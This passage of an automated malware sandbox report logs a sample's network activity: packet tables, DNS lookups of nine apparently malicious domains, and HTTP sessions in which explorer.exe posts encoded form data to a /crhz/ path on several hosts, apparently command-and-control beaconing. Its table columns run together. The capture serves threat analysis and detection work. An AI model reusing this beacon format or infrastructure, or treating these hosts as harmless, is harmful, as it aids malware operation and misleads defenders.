                                                                Jan 30, 2023 14:52:54.006603003 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.006794930 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.016726017 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.187874079 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282556057 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282608986 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282660961 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282712936 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282764912 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:54.282900095 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.282973051 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.283251047 CET4972980192.168.2.6184.94.215.91
                                                                Jan 30, 2023 14:52:54.454081059 CET8049729184.94.215.91192.168.2.6
                                                                Jan 30, 2023 14:52:59.408248901 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:52:59.706686974 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:52:59.706819057 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:52:59.707041025 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.005126953 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332551956 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332595110 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332622051 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.332743883 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.340389013 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.340432882 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.340557098 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.353301048 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.353323936 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.353461981 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.376853943 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.376912117 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.377074957 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.382388115 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.383605957 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:00.631855011 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.631886959 CET8049730103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:00.632065058 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:01.210660934 CET4973080192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.226944923 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.525616884 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:02.525881052 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.526284933 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:02.826761007 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.089288950 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.089373112 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.089421988 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.089454889 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.102144003 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.102201939 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.102242947 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.109050989 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.109071016 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.109162092 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.128443003 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.128460884 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.128479958 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.128513098 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.128540993 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:03.390084982 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.390124083 CET8049731103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:03.390314102 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:04.042043924 CET4973180192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.055406094 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.346223116 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.346335888 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.346477032 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.637743950 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.842413902 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.842509031 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:05.842585087 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:05.842778921 CET4973380192.168.2.6103.221.223.104
                                                                Jan 30, 2023 14:53:06.132190943 CET8049733103.221.223.104192.168.2.6
                                                                Jan 30, 2023 14:53:10.899293900 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.918121099 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.918365955 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.918714046 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.937977076 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.944618940 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.944701910 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.944880009 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:10.960635900 CET804973476.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:10.960881948 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:12.430260897 CET4973480192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.446420908 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.465547085 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.465756893 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.465934992 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.485127926 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.485183954 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.489326954 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.489356041 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.489521027 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:13.504614115 CET804973576.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:13.504766941 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:15.183377028 CET4973580192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.459997892 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.478792906 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.479120970 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.479351044 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.498285055 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.502583981 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.502609968 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.503109932 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.503109932 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.515495062 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:16.515577078 CET4973680192.168.2.676.223.105.230
                                                                Jan 30, 2023 14:53:16.522129059 CET804973676.223.105.230192.168.2.6
                                                                Jan 30, 2023 14:53:21.539298058 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:21.559437037 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.559734106 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:21.559890985 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:21.579907894 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.582130909 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.582182884 CET804973781.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:21.582329035 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:23.072971106 CET4973780192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.087867975 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.107870102 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.108068943 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.108309984 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:24.128197908 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.129245043 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.129281044 CET804973881.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:24.129385948 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:25.618851900 CET4973880192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.635763884 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.656297922 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.660391092 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.660531998 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.680896997 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.680932045 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.680949926 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:26.681301117 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.687810898 CET4973980192.168.2.681.169.145.72
                                                                Jan 30, 2023 14:53:26.708287954 CET804973981.169.145.72192.168.2.6
                                                                Jan 30, 2023 14:53:32.419715881 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:32.628928900 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.629105091 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:32.629285097 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:32.838231087 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.840301037 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.840337038 CET8049741163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:32.840447903 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:34.135165930 CET4974180192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.151458025 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.352411985 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.352718115 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.352989912 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:35.553666115 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.555524111 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.555552006 CET8049742163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:35.555628061 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:36.861062050 CET4974280192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:37.871694088 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:38.077023983 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.077142000 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:38.077323914 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:38.282538891 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.284764051 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.284797907 CET8049743163.44.198.50192.168.2.6
                                                                Jan 30, 2023 14:53:38.284982920 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:48.845897913 CET4974380192.168.2.6163.44.198.50
                                                                Jan 30, 2023 14:53:49.051172018 CET8049743163.44.198.50192.168.2.6

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 30, 2023 14:52:04.887362003 CET4944853192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:52:04.934912920 CET53494488.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:52:15.149280071 CET5908253192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:52:15.296698093 CET53590828.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:52:25.676759005 CET6386353192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:52:25.786144018 CET53638638.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:52:37.351376057 CET6253853192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:52:37.379280090 CET53625388.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:52:48.252239943 CET5153053192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:52:48.275645971 CET53515308.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:52:59.297007084 CET5612253192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:52:59.407166004 CET53561228.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:53:10.874785900 CET6160953192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:53:10.897556067 CET53616098.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:53:21.514297009 CET5248153192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:53:21.536995888 CET53524818.8.8.8192.168.2.6
                                                                Jan 30, 2023 14:53:31.715282917 CET5608653192.168.2.68.8.8.8
                                                                Jan 30, 2023 14:53:32.418251038 CET53560868.8.8.8192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 30, 2023 14:52:04.887362003 CET192.168.2.68.8.8.80x2b9dStandard query (0)www.laylaroseuk.comA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:15.149280071 CET192.168.2.68.8.8.80xce2Standard query (0)www.n-r-eng.comA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:25.676759005 CET192.168.2.68.8.8.80x37feStandard query (0)www.sandpiper-apts.comA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:37.351376057 CET192.168.2.68.8.8.80xa8cStandard query (0)www.tf8dangky.onlineA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:48.252239943 CET192.168.2.68.8.8.80xe0fcStandard query (0)www.teammart.onlineA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:59.297007084 CET192.168.2.68.8.8.80x25b8Standard query (0)www.suachuadienlanh247.comA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:53:10.874785900 CET192.168.2.68.8.8.80x36dcStandard query (0)www.hvlandscapes.bizA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:53:21.514297009 CET192.168.2.68.8.8.80xee85Standard query (0)www.frogair.onlineA (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:53:31.715282917 CET192.168.2.68.8.8.80x511bStandard query (0)www.mitsubangsaen.onlineA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 30, 2023 14:52:04.934912920 CET8.8.8.8192.168.2.60x2b9dNo error (0)www.laylaroseuk.comlaylaroseuk.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 30, 2023 14:52:04.934912920 CET8.8.8.8192.168.2.60x2b9dNo error (0)laylaroseuk.com2.57.90.16A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:15.296698093 CET8.8.8.8192.168.2.60xce2No error (0)www.n-r-eng.com185.151.199.52A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:25.786144018 CET8.8.8.8192.168.2.60x37feNo error (0)www.sandpiper-apts.com164.88.201.214A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:37.379280090 CET8.8.8.8192.168.2.60xa8cNo error (0)www.tf8dangky.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 30, 2023 14:52:37.379280090 CET8.8.8.8192.168.2.60xa8cNo error (0)dns.ladipage.comladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 30, 2023 14:52:37.379280090 CET8.8.8.8192.168.2.60xa8cNo error (0)ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com18.138.206.213A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:37.379280090 CET8.8.8.8192.168.2.60xa8cNo error (0)ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com13.251.100.80A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:37.379280090 CET8.8.8.8192.168.2.60xa8cNo error (0)ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com18.142.208.246A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:48.275645971 CET8.8.8.8192.168.2.60xe0fcNo error (0)www.teammart.online184.94.215.91A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:52:59.407166004 CET8.8.8.8192.168.2.60x25b8No error (0)www.suachuadienlanh247.com103.221.223.104A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:53:10.897556067 CET8.8.8.8192.168.2.60x36dcNo error (0)www.hvlandscapes.bizhvlandscapes.bizCNAME (Canonical name)IN (0x0001)false
                                                                Jan 30, 2023 14:53:10.897556067 CET8.8.8.8192.168.2.60x36dcNo error (0)hvlandscapes.biz76.223.105.230A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:53:10.897556067 CET8.8.8.8192.168.2.60x36dcNo error (0)hvlandscapes.biz13.248.243.5A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:53:21.536995888 CET8.8.8.8192.168.2.60xee85No error (0)www.frogair.onlinefrogair.onlineCNAME (Canonical name)IN (0x0001)false
                                                                Jan 30, 2023 14:53:21.536995888 CET8.8.8.8192.168.2.60xee85No error (0)frogair.online81.169.145.72A (IP address)IN (0x0001)false
                                                                Jan 30, 2023 14:53:32.418251038 CET8.8.8.8192.168.2.60x511bNo error (0)www.mitsubangsaen.onlinecname.u01.df.bkk1.cloud.z.comCNAME (Canonical name)IN (0x0001)false
                                                                Jan 30, 2023 14:53:32.418251038 CET8.8.8.8192.168.2.60x511bNo error (0)cname.u01.df.bkk1.cloud.z.com163.44.198.50A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • www.laylaroseuk.com
                                                                • www.n-r-eng.com
                                                                • www.sandpiper-apts.com
                                                                • www.tf8dangky.online
                                                                • www.teammart.online
                                                                • www.suachuadienlanh247.com
                                                                • www.hvlandscapes.biz
                                                                • www.frogair.online
                                                                • www.mitsubangsaen.online

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.6497122.57.90.1680C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:04.976145029 CET99OUTGET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk HTTP/1.1
                                                                Host: www.laylaroseuk.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:52:05.010261059 CET99INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:04 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.649713185.151.199.5280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:15.370327950 CET101OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.n-r-eng.com
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.n-r-eng.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.n-r-eng.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 7a 4a 7e 67 54 63 42 5a 72 74 71 51 71 69 6c 78 30 71 32 37 34 4f 41 5a 70 71 68 55 41 6c 45 6c 4c 75 42 39 45 6c 43 64 67 4b 64 69 48 48 68 68 6e 6b 45 4f 56 61 71 65 4b 75 4e 59 71 48 42 5a 52 46 38 72 48 33 6d 79 7a 2d 41 30 47 52 75 67 38 4b 46 32 59 5a 38 4b 42 36 73 33 42 31 51 4a 46 41 7a 79 35 36 58 2d 77 4e 67 31 74 4f 73 50 6b 39 43 39 75 53 6d 58 73 70 6b 36 49 77 6c 73 5a 52 42 47 4c 45 4a 42 75 75 49 31 79 5a 46 37 44 46 54 4d 46 6f 4a 77 48 4d 47 54 56 6c 75 4d 74 5a 41 5f 57 43 6a 47 57 4d 6b 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMFoJwHMGTVluMtZA_WCjGWMk.
                                                                Jan 30, 2023 14:52:15.456197977 CET101INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://www.n-r-eng.com/crhz/
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                10192.168.2.649727184.94.215.9180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:48.450901985 CET154OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.teammart.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.teammart.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.teammart.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 36 33 74 4b 71 42 6e 31 47 51 57 68 49 5f 64 69 55 54 6a 6e 78 2d 77 38 69 4b 78 78 78 6b 33 36 45 41 6c 41 7a 76 36 57 50 4f 43 48 61 57 59 6d 55 62 69 5a 54 4b 51 74 7e 53 31 4f 71 68 4a 72 7a 77 49 38 54 63 31 33 4a 50 44 75 59 33 44 30 6c 68 66 37 48 34 5a 75 71 7a 76 54 69 64 4a 35 78 41 48 51 75 71 52 6b 35 54 68 31 6a 65 31 67 4a 67 49 78 42 49 32 70 4a 70 62 71 47 57 6a 76 65 69 76 4e 35 49 6c 75 45 2d 5a 76 59 50 73 63 75 71 6e 34 4b 61 67 70 79 6a 57 47 64 54 32 7a 49 74 39 54 6e 41 70 63 6c 70 4d 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=1bSqDFR5OvcN63tKqBn1GQWhI_diUTjnx-w8iKxxxk36EAlAzv6WPOCHaWYmUbiZTKQt~S1OqhJrzwI8Tc13JPDuY3D0lhf7H4ZuqzvTidJ5xAHQuqRk5Th1je1gJgIxBI2pJpbqGWjveivN5IluE-ZvYPscuqn4KagpyjWGdT2zIt9TnApclpM.
                                                                Jan 30, 2023 14:52:48.741343975 CET156INHTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:52:48 GMT
                                                                Server: Apache
                                                                Content-Length: 5278
                                                                Connection: close
                                                                Content-Type: text/html
